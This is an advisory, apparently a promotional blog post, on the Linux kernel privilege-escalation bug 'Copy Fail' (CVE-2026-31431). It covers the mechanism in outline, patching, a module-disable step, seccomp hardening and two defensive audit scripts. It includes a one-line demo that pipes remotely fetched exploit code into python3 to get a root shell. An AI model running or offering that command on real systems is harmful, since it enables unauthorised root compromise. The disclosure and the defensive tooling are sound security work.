Copy Fail: Critical Linux Kernel Exploit CVE-2026-31431
Copy Fail: The Silent Linux Kernel Killer (CVE-2026-31431)
A single 732-byte Python script. Four major Linux distributions. Four root shells: no modifications, no recompilation, no fuss. Welcome to Copy Fail (CVE-2026-31431), the most portable local privilege escalation in recent Linux history.
The Exploit That Works Everywhere
Discovered through AI-assisted auditing by Xint Code, Copy Fail exploits a 2017 kernel optimization in the algif_aead crypto interface. Unprivileged users can write 4 controlled bytes directly into the page cache of any readable file, including setuid-root binaries like /usr/bin/su.
```
$ curl https://copy.fail/exp | python3 && su
# id
uid=0(root) gid=1002(user) groups=1002(user)
```
One take. 100% reliable. Every distro.
Who Needs to Panic (Patch Order)
| Priority | Environment | Risk |
|---|---|---|
| High | Multi-tenant hosts, Kubernetes, CI runners | Any user → host root |
| High | Cloud SaaS, notebook hosts | Tenant escape to host |
| Medium | Single-tenant servers | Internal LPE chain |
| Lower | Single-user workstations | Post-exploitation only |
Verified affected: Ubuntu 24.04, Amazon Linux 2023, RHEL 10, SUSE 16 (and counting).
What Makes Copy Fail Different
| Property | Typical LPE | Copy Fail |
|---|---|---|
| Race condition | ❌ Required | ✅ None |
| Per-distro offsets | ❌ Required | ✅ Universal |
| Reliability | 30-80% | ✅ 100% single-shot |
| Affected window | Narrow range | 2017 to 2026 (9 years) |
| Container escape | ❌ Host-only | ✅ Cross-tenant |
Unlike Dirty Pipe (pipe flags) or Dirty Cow (race conditions), Copy Fail is straight-line code abusing AEAD scatterlist mishandling.
Immediate Mitigation
1. Patch (Primary)
```sh
# Update kernel to include mainline commit a664bf3d603d
apt update && apt upgrade linux-image-generic   # Ubuntu
yum update kernel                                # RHEL
zypper update kernel                             # SUSE
```
2. Emergency Disable (Pre-patch)
```sh
echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf
rmmod algif_aead 2>/dev/null || true
```
Performance impact: None for 99.9% of workloads. Only affects rare AF_ALG users.
3. Container Hardening
Block AF_ALG sockets via seccomp for untrusted workloads.
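The two pre-patch mitigations above (the modprobe blacklist in step 2 and the seccomp block in step 3) are easy to deploy and just as easy to get subtly wrong. The following is an added example, not code from the advisory or from Xint Code, that a defender can use to audit both: it parses a modprobe.d fragment and /proc/modules text for the algif_aead disable state, emits a Docker/containerd-style seccomp profile that returns an error for `socket(AF_ALG, ...)`, and optionally probes whether AF_ALG socket creation is actually refused on the running host. It assumes the Linux value `AF_ALG == 38` and the `install <module> /bin/false` modprobe idiom used in step 2; the sample config and /proc/modules lines in the self-check are constructed.

```python
"""Audit helpers for the Copy Fail pre-patch mitigations (added example)."""
import json
import re
import socket

AF_ALG = 38            # Linux address-family number for AF_ALG (assumed constant)
MODULE = "algif_aead"  # module named in the advisory's emergency-disable step


def modprobe_disables(conf_text: str, module: str = MODULE) -> bool:
    """True if a modprobe.d fragment maps `module` to /bin/false or /bin/true.

    A commented-out line ("# install ...") does not count: the regex is anchored
    at the start of the line so the leading '#' prevents a match.
    """
    pat = re.compile(r"^\s*install\s+" + re.escape(module) + r"\s+/bin/(?:false|true)\b",
                     re.MULTILINE)
    return bool(pat.search(conf_text))


def module_loaded(proc_modules_text: str, module: str = MODULE) -> bool:
    """True if `module` is the first column of any /proc/modules-style line."""
    for line in proc_modules_text.splitlines():
        fields = line.split()
        if fields and fields[0] == module:
            return True
    return False


def build_seccomp_profile() -> dict:
    """Docker-style seccomp profile: allow everything except socket() with AF_ALG.

    SCMP_ACT_ERRNO makes the call fail (EPERM by default in runc) instead of
    killing the process, so a workload that probes AF_ALG degrades gracefully.
    """
    return {
        "defaultAction": "SCMP_ACT_ALLOW",
        "syscalls": [
            {
                "names": ["socket"],
                "action": "SCMP_ACT_ERRNO",
                "args": [{"index": 0, "value": AF_ALG, "op": "SCMP_CMP_EQ"}],
            }
        ],
    }


def af_alg_blocked_on_host() -> bool:
    """Live probe: True if creating an AF_ALG socket is refused (module disabled
    or seccomp-filtered). Not used in the self-check because the answer depends
    on the machine this runs on."""
    family = getattr(socket, "AF_ALG", AF_ALG)
    try:
        s = socket.socket(family, socket.SOCK_SEQPACKET)
    except OSError:
        return True
    s.close()
    return False


def audit(conf_text: str, proc_modules_text: str) -> dict:
    """Summarise the blacklist/loaded state for a report."""
    return {
        "blacklisted": modprobe_disables(conf_text),
        "loaded": module_loaded(proc_modules_text),
        "seccomp_profile": json.dumps(build_seccomp_profile()),
    }


if __name__ == "__main__":
    # Constructed sample inputs; on a real host read the files instead:
    #   open("/etc/modprobe.d/disable-algif.conf").read(), open("/proc/modules").read()
    sample_conf = "install algif_aead /bin/false\n"
    sample_modules = "algif_aead 16384 0 - Live 0x0000000000000000\n"
    print(audit(sample_conf, sample_modules))
    print("AF_ALG refused on this host:", af_alg_blocked_on_host())
```

Write the profile to a file and pass it with `--security-opt seccomp=<file>` (Docker) or the equivalent pod `securityContext.seccompProfile` on Kubernetes; note that the blacklist only prevents future autoloading, so a host still reporting `loaded: True` needs the `rmmod` from step 2 or a reboot.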
Technical Deep Dive
The vulnerability lives in algif_aead (AF_ALG socket family). A 2017 'optimization' allowed in-place crypto where page-cache pages (read-only source) became the writable destination scatterlist.
- splice() feeds page-cache pages into the crypto scatterlist
- AEAD authentication scribbles 4 AAD ESN bytes past buffer bounds
- authenc_esn never restores the overwritten page-cache bytes
- execve(/usr/bin/su) reads the corrupted page cache → root shell
Stealth bonus: No VFS writes, no dirty pages, no disk changes. Evict the cache or reboot and the file is clean again.
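Because the corruption lives only in clean page-cache pages, the on-disk bytes are still intact and the two can be compared. The following is an added example, not from the advisory or from Xint Code, that turns the "evict cache or reboot" observation into a detection check: it hashes a file as normally read (through the page cache), evicts its cached pages with `posix_fadvise(POSIX_FADV_DONTNEED)`, and hashes it again so the second read comes from disk; a mismatch means the cached copy was not what is on disk. It assumes Linux and a filesystem that honours `POSIX_FADV_DONTNEED`; the default target list (`/usr/bin/su` plus two other setuid binaries) and the temp-file self-check are constructed.

```python
"""Page-cache vs on-disk consistency check (added example, not the advisory's code)."""
import hashlib
import os
import tempfile

# Constructed default target list: /usr/bin/su is named in the advisory, the
# others are ordinary setuid binaries worth the same check.
DEFAULT_TARGETS = ("/usr/bin/su", "/usr/bin/sudo", "/usr/bin/passwd")


def sha256_via_read(path: str) -> str:
    """Hash the file the way execve() sees it: through the page cache."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()


def evict_page_cache(path: str) -> bool:
    """Drop clean cached pages for `path`. Returns False where unsupported.

    Caveat: pages still mapped by a running process (e.g. a live su) are not
    evicted, so a mismatch can hide until that process exits.
    """
    if not hasattr(os, "posix_fadvise"):
        return False
    fd = os.open(path, os.O_RDONLY)
    try:
        os.posix_fadvise(fd, 0, 0, os.POSIX_FADV_DONTNEED)
    finally:
        os.close(fd)
    return True


def cache_matches_disk(path: str) -> tuple:
    """Return (consistent, cached_hash, disk_hash) for one file."""
    cached = sha256_via_read(path)
    evict_page_cache(path)          # the next read must come from disk
    on_disk = sha256_via_read(path)
    return cached == on_disk, cached, on_disk


def check_targets(paths=DEFAULT_TARGETS) -> dict:
    """Map each existing target to True (consistent) or False (cache differs)."""
    return {p: cache_matches_disk(p)[0] for p in paths if os.path.isfile(p)}


def selftest() -> bool:
    """Constructed sample: an untampered temp file must hash identically both ways."""
    with tempfile.NamedTemporaryFile(delete=False) as tf:
        tf.write(b"constructed sample bytes\n" * 4096)
        name = tf.name
    try:
        consistent, a, b = cache_matches_disk(name)
        return consistent and a == b and len(a) == 64
    finally:
        os.unlink(name)


if __name__ == "__main__":
    for path, ok in check_targets().items():
        print(f"{'OK ' if ok else 'MISMATCH'} {path}")
    print("selftest:", selftest())
```

Run it before patching to confirm nothing has been planted, and treat any MISMATCH as an incident rather than just re-running after a reboot, since the eviction also destroys the evidence. Package verifiers such as `rpm -V` or `debsums` read through the page cache too, so they will flag the same corruption against the package database without needing the eviction step.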
Disclosure Timeline
- 2026-03-23: Reported to kernel team
- 2026-04-01: Patch committed
- 2026-04-29: Public disclosure
Defend Responsibly
The PoC is public (sha256: a567d09b15f6e4440e70c9f2aa8edec8ed59f53301952df05c719aa3911687f9) for defenders to test patches. Only run on authorized systems.
Multi-tenant operators: Patch yesterday. This isn't theoretical.
Found by Xint Code: AI security auditing that actually works.